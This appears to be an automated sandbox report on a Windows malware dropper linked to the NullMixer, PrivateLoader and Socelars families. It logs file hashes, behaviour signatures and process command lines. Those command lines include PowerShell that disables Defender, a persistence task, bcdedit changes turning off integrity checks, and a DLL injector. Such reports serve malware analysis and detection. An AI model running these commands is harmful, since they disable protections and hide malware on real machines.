schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "410733652-792252731-15552243301337362575265087720-19596527081131691164-1956904596"
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 1672
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
Files
memory/804-237-0x0000000003C80000-0x0000000003C81000-memory.dmp
memory/804-235-0x0000000003C80000-0x0000000003C81000-memory.dmp
memory/2836-245-0x0000000000400000-0x0000000000414000-memory.dmp
memory/804-232-0x0000000003000000-0x0000000003001000-memory.dmp
memory/804-230-0x0000000003000000-0x0000000003001000-memory.dmp
memory/804-227-0x0000000002F50000-0x0000000002F51000-memory.dmp
memory/804-225-0x0000000002F50000-0x0000000002F51000-memory.dmp
memory/804-222-0x0000000002EA0000-0x0000000002EA1000-memory.dmp
memory/804-220-0x0000000002EA0000-0x0000000002EA1000-memory.dmp
memory/804-217-0x00000000029E0000-0x00000000029E1000-memory.dmp
memory/804-215-0x00000000029E0000-0x00000000029E1000-memory.dmp
memory/804-213-0x00000000029E0000-0x00000000029E1000-memory.dmp
memory/804-212-0x0000000000D00000-0x0000000000D01000-memory.dmp
memory/804-210-0x0000000000D00000-0x0000000000D01000-memory.dmp
memory/804-208-0x0000000000D00000-0x0000000000D01000-memory.dmp
memory/1948-243-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
| MD5 | 7d7f14a1b3b8ee4e148e82b9c2f28aed |
| SHA1 | 649a29887915908dfba6bbcdaed2108511776b5a |
| SHA256 | 623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb |
| SHA512 | 585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3 |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe
| MD5 | b84f79adfccd86a27b99918413bb54ba |
| SHA1 | 06a61ab105da65f78aacdd996801c92d5340b6ca |
| SHA256 | 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49 |
| SHA512 | 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38 |
C:\Users\Admin\AppData\Local\Temp\is-MAFVS.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/2860-108-0x0000000064940000-0x0000000064959000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-MAFVS.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2860-107-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2860-106-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2860-104-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2860-100-0x0000000000400000-0x000000000051C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ad13d7ad1b02.exe
| MD5 | 6881c116d2a78c375de73a298a732427 |
| SHA1 | 36112627325603afc821d28b2da69f7da58e27ab |
| SHA256 | c15359f15f0402b2db3b3704d0bacee6996c04bc1f37195eb02ac30cf2fc5844 |
| SHA512 | 598cc49d79c236f6fc493438cd103e367c477480adf10f279613767536762c67c1b712bb00fb620c535647f1e002d88d0cba60cab02ef602be8e7bc009c0d728 |
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe
| MD5 | 34025b6eb0aa1236b91ca1ab765acbd3 |
| SHA1 | cfb12b89aa55158e7b0b38f8fd5b8bf590660793 |
| SHA256 | db3c03a5f74e0e9114883bb5c0db60abb4f32e4712e32a953179f0626c529b14 |
| SHA512 | d5d4cf4f3dcdc79ae92792307ee82922af55bdc4d81708c140c03c1979da3b8e2d0f009ddde6f680a0197ab7668824dab81393ba9bca6533a603eddd30e22fdd |
memory/2860-79-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2860-78-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2860-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2860-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2860-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/1448-260-0x0000000000450000-0x000000000047E000-memory.dmp
memory/316-275-0x0000000002320000-0x00000000027DA000-memory.dmp
memory/316-276-0x0000000001E60000-0x0000000001F0E000-memory.dmp
memory/316-280-0x0000000002C70000-0x0000000002D0B000-memory.dmp
memory/316-278-0x0000000002C70000-0x0000000002D0B000-memory.dmp
memory/316-277-0x0000000002C70000-0x0000000002D0B000-memory.dmp
memory/2132-293-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1868-311-0x0000000000400000-0x0000000000420000-memory.dmp
memory/804-319-0x0000000000400000-0x0000000000AFD000-memory.dmp
memory/804-321-0x00000000011F0000-0x00000000018ED000-memory.dmp
memory/1596-361-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Program Files (x86)\Gparted\Build.exe
| MD5 | c874508845d1c0bb486f5e41af8de480 |
| SHA1 | 3ac7e246934ba74c1018d50138bea77b035d6f90 |
| SHA256 | 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be |
| SHA512 | 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758 |
memory/3000-392-0x0000000000230000-0x0000000000238000-memory.dmp
memory/3000-391-0x0000000001220000-0x0000000001242000-memory.dmp
C:\Program Files (x86)\Gparted\gimagex.exe
| MD5 | 85199ea4a530756b743ad4491ea84a44 |
| SHA1 | 0842cd749986d65d400a9605d17d2ed7a59c13cc |
| SHA256 | 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa |
| SHA512 | b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SDK23TBKX6BDNIQIPQ1Y.temp
| MD5 | 293d0416bcda13e1649de81d3b609bb2 |
| SHA1 | 0a43e1dd48c95a4b2ddfab5f34f4b7f8b1ed03c4 |
| SHA256 | 1af6038dba0c86e9014d26c848d12d78d2739c786abb7fc0956536b210b8c196 |
| SHA512 | 503945513122def7d71479b0bc6e822b32f924abae41f3ceda174693f408d99c3e3e32636015747e36ecddbee60844a9ca87817af3ab456ada34415fb80dabfb |
memory/2756-442-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/2756-447-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab454A.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar517B.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-06 10:40
Reported
2024-11-06 10:43
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command Line |
| C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe | "C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe" |
| C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe | "C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon166dc6040fb8726.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon16bd4a93b822a.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon1661118952.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon16b7581baf7.exe /mixtwo |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon167f9db638e4.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon16ad13d7ad1b02.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon1618e4439d986270.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon1631358b82299bd8.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon16d070a064013c841.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon16734014a69dec.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon16737798ac26f984.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon164c5af508c3.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon16957e622fa390.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon16ac385cfd.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon16e127a54386dd68.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon161bd381a14aea5c.exe |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files